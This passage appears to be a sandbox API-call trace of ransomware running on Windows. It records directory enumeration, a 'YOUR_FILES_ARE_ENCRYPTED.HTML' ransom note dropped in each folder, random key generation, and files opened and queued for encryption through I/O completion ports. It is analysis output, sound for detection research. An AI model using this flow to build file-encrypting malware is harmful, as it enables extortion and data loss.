returned 1 [0111.397] CloseHandle (hObject=0x318) returned 1 [0111.397] GetProcessHeap () returned 0x600000 [0111.398] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3112fd0 | out: hHeap=0x600000) returned 1 [0111.398] GetProcessHeap () returned 0x600000 [0111.398] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.399] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x816c4cf7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa4, dwReserved1=0x632a08, cFileName="officeclient.microsoft.com", cAlternateFileName="OFFICE~1.COM")) returned 1 [0111.399] StrStrIW (lpFirst="officeclient.microsoft.com", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.399] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com") returned 113 [0111.399] GetProcessHeap () returned 0x600000 [0111.399] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0111.401] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com" [0111.401] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*" [0111.401] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x816c4cf7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.402] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x816c4cf7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="..", cAlternateFileName="")) returned 1 [0111.402] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1fe741f9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="85783D1F-A228-4706-A7FF-1C07A8CCD84F", cAlternateFileName="85783D~1")) returned 1 [0111.402] StrStrIW (lpFirst="85783D1F-A228-4706-A7FF-1C07A8CCD84F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.402] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\85783D1F-A228-4706-A7FF-1C07A8CCD84F") returned 150 [0111.402] PathFindExtensionW (pszPath="85783D1F-A228-4706-A7FF-1C07A8CCD84F") returned="" [0111.402] lstrlenW (lpString="") returned 0 [0111.402] PathFindExtensionW (pszPath="85783D1F-A228-4706-A7FF-1C07A8CCD84F") returned="" [0111.402] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816c39b5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816c39b5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816c4cf7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C338C40A-C217-41F2-BFDE-349C7FE47266", cAlternateFileName="C338C4~1")) returned 1 [0111.402] StrStrIW (lpFirst="C338C40A-C217-41F2-BFDE-349C7FE47266", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.402] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\C338C40A-C217-41F2-BFDE-349C7FE47266") returned 150 [0111.402] PathFindExtensionW (pszPath="C338C40A-C217-41F2-BFDE-349C7FE47266") returned="" [0111.402] lstrlenW (lpString="") returned 0 [0111.402] PathFindExtensionW (pszPath="C338C40A-C217-41F2-BFDE-349C7FE47266") returned="" [0111.402] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816c39b5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816c39b5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816c4cf7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="C338C40A-C217-41F2-BFDE-349C7FE47266", cAlternateFileName="C338C4~1")) returned 0 [0111.402] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.403] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0111.403] GetProcessHeap () returned 0x600000 [0111.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3112fd0 [0111.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\officeclient.microsoft.com\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0111.404] WriteFile (in: hFile=0x318, lpBuffer=0x3112fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3112fd0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0111.406] CloseHandle (hObject=0x318) returned 1 [0111.406] GetProcessHeap () returned 0x600000 [0111.406] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3112fd0 | out: hHeap=0x600000) returned 1 [0111.406] GetProcessHeap () returned 0x600000 [0111.406] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.408] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x816c4cf7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa4, dwReserved1=0x632a08, cFileName="officeclient.microsoft.com", cAlternateFileName="OFFICE~1.COM")) returned 0 [0111.408] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.408] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0111.408] GetProcessHeap () returned 0x600000 [0111.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3112fd0 [0111.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0111.412] WriteFile (in: hFile=0x330, lpBuffer=0x3112fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3112fd0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0111.413] CloseHandle (hObject=0x330) returned 1 [0111.414] GetProcessHeap () returned 0x600000 [0111.414] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3112fd0 | out: hHeap=0x600000) returned 1 [0111.414] GetProcessHeap () returned 0x600000 [0111.414] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0111.414] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1fe741f9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc4c65af, cFileName="AllUsers", cAlternateFileName="")) returned 0 [0111.415] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0111.415] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0111.415] GetProcessHeap () returned 0x600000 [0111.415] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.415] WriteFile (in: hFile=0x334, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.416] CloseHandle (hObject=0x334) returned 1 [0111.417] GetProcessHeap () returned 0x600000 [0111.417] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.417] GetProcessHeap () returned 0x600000 [0111.417] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.418] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fa7c66, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82fa7c66, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82fa7c66, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x197d6, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="winword.exe_Rules.xml", cAlternateFileName="WINWOR~1.XML")) returned 1 [0111.418] StrStrIW (lpFirst="winword.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.418] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml") returned 83 [0111.418] PathFindExtensionW (pszPath="winword.exe_Rules.xml") returned=".xml" [0111.418] lstrlenW (lpString=".xml") returned 4 [0111.418] PathFindExtensionW (pszPath="winword.exe_Rules.xml") returned=".xml" [0111.418] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.419] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=104406) returned 1 [0111.419] GetProcessHeap () returned 0x600000 [0111.419] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.421] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="F0") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="05") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="20") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="07") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="2B") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E9") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="91") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="02") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D8") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="07") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="5D") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="7A") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="12") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="7E") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="43") returned 2 [0111.421] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="95") returned 2 [0111.422] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="99") returned 2 [0111.422] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="CC") returned 2 [0111.422] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="48") returned 2 [0111.422] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="52") returned 2 [0111.422] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="47") returned 2 [0111.422] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="AE") returned 2 [0111.422] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="3E") returned 2 [0111.422] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C1") returned 2 [0111.422] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="1E") returned 2 [0111.422] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="89") returned 2 [0111.422] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="0E") returned 2 [0111.422] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="F8") returned 2 [0111.422] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B6") returned 2 [0111.422] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="70") returned 2 [0111.422] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="21") returned 2 [0111.422] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="20") returned 2 [0111.422] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" [0111.422] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.422] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.422] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fa7c66, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82fa7c66, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82fa7c66, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x197d6, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="winword.exe_Rules.xml", cAlternateFileName="WINWOR~1.XML")) returned 0 [0111.423] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0111.423] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0111.423] GetProcessHeap () returned 0x600000 [0111.423] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.423] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.424] CloseHandle (hObject=0x31c) returned 1 [0111.425] GetProcessHeap () returned 0x600000 [0111.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.425] GetProcessHeap () returned 0x600000 [0111.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.425] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x696efe32, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0xcbfe96be, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfebdca, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="OTele", cAlternateFileName="")) returned 1 [0111.425] StrStrIW (lpFirst="OTele", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.425] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele") returned 62 [0111.425] GetProcessHeap () returned 0x600000 [0111.425] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.425] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele" [0111.425] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\*" [0111.425] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x696efe32, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0xcbfe96be, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfebdca, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.427] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x696efe32, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0xcbfe96be, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfebdca, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="..", cAlternateFileName="")) returned 1 [0111.428] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbfe8337, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xcbfe8337, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfe8337, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x11d, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTele.dat", cAlternateFileName="{09178~2.DAT")) returned 1 [0111.428] StrStrIW (lpFirst="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTele.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.428] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTele.dat") returned 139 [0111.429] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTele.dat") returned=".dat" [0111.429] lstrlenW (lpString=".dat") returned 4 [0111.429] PathFindExtensionW (pszPath="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTele.dat") returned=".dat" [0111.429] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTele.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\otele\\{09178d66-ba92-4de3-b96c-2b24754031bf} (0) - 1840 - msaccess.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.436] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=285) returned 1 [0111.436] CloseHandle (hObject=0x334) returned 1 [0111.436] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbfe5c24, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xcbfe5c24, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xcbfe6fb2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x351, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat", 